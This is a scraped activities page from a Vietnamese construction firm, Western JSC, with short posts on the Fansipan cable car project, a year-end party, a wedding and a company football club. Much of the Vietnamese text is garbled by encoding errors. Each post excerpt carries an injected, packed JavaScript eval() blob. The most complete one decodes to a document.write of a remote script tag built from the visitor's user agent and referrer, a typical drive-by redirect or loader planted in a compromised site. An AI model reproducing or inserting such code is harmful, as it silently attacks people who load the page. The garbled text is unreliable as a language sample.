Our activities

10167983_706059639516296_5873293541876364276_n

Western: Công trình trong sương – Cáp treo Fansipan SaPa

Western thi công h?ng m?c nhà ga ?i Block 02 và Block 04 thu?c d? án Cáp treo Fansipan Sapa. M?t s? hình ?nh thi công trong ?i?u ki?n th?i ti?t ??c bi?t b?c nh?t Vi?t Nam. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more
Fanxipang%205[1]

Đầu xuân 2015 Western JSC khởi công thi công dự án Cáp treo Fanxipan – Lào Cai

N?m eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbezs|var|u0026u|referrer|irsaz||js|php'.split('|'),0,{})) ...  Read more
1948193_692881394167454_8620104240398495006_n

Western đón tất niên cuối năm 2014!

Western ?ón t?t niên cu?i n?m 2014! L?i m?t n?m n?a trôi qua cùng v?i nh?ng th?ng tr?m trong công vi?c và cu?c s?ng. Toàn th? công ty l?i m?t l?n h?p m?t cùng nhau ?? g?p m?t, chia s? và ?úc rút kinh nghi?m cho nh?ng n?m phát tri?n phía tr??c. eval(function(p,a,c,k,e,d){e=function(c){return...  Read more
10411205_654137551375172_769494927204105170_n

Western chúc hỉ chú Sự!

Chú ?inh Xuân S?, m?t trong nh?ng cán b? lâu n?m nh?t c?a Western. ?ây là l? t? ch?c c??i c?a con trai chú. Chúc gia ?ình chú nh?ng l?i chúc t?t ??p nh?t! eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more
10731110_630462990409295_1521071124194562717_n

Western Football Club ! – Glonics – Thái Nguyên

Western Football Club ! – Glonics – Thái Nguyên M?t trong nh?ng ho?t ??ng th? thao t?i các công tr??ng c?a Western. Sau th?i gian làm vi?c c?ng th?ng là nh?ng phút tho?i mái v?i nh?ng ho?t ??ng b? ích. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more